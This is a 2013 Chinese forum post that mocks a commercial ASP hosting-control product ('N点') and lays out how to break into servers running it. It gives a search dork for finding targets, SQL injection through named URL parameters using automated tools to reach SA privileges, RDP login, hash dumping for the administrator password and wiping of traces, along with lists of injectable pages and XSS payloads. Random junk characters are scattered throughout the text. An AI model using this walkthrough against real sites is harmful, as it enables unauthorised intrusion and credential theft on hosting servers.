不得不说N点实在是一个破东西
: D1 R( M$ _( [6 J* U4 X就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂9 ~* k' N. V `( b: {
好吧 抱怨一下就行了 接下来关键的时候到了- }( V" k/ i8 L& C' G M
首先百度搜索关键字:inurl: (mmdatabase.asp)
5 c+ w5 j8 X# I3 u: A! l( l我随便列举一个: www.xxxx.com
J. K( x0 J$ F修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
) V) C# u8 ?9 N9 X" v- S* }1 @扔入NBSI 或者啊D等各种傻逼工具后" Z/ [0 W& W4 f, {. e* K4 ~3 G
你们会看到是SA权限- ^3 t6 J: R# a
果断3389 上去 hash得到administrator密码' [, {. b7 F! R/ l( o2 d5 t) {4 ]
擦屁股走人~
& G, P' m% k1 c9 }0 e经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的 V+ B! l0 f5 @5 C. ~
" Z% i x0 J: y: l/ q5 h
再附上其他几个漏洞页面8 _5 Q P) y# B- ^3 m
SQL:% a1 x* e6 R3 H
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=10 S4 G% |% n* t* J4 v+ Z0 V K
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
8 z. q3 [! f# V( _http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=91 F- K9 L4 z: K7 V
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=20 T5 d1 f/ C3 b
XSS证明:
$ b j3 r) N2 b9 W! X* B6 _http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
% b3 r. e7 ?' x$ d x x* Mhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”0 r1 }/ X7 G6 J& W# N
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>7 T. a2 o8 h p/ q" {$ Z# ~& g
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
9 B' g3 t1 q5 _7 a: l4 q2 r还是星外吧 你们懂的
1 T3 c. e4 U5 ?) n, E; d' T! _作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?( W3 m" n5 w7 h4 B, i0 d
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
0 b; z$ h' R! q——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对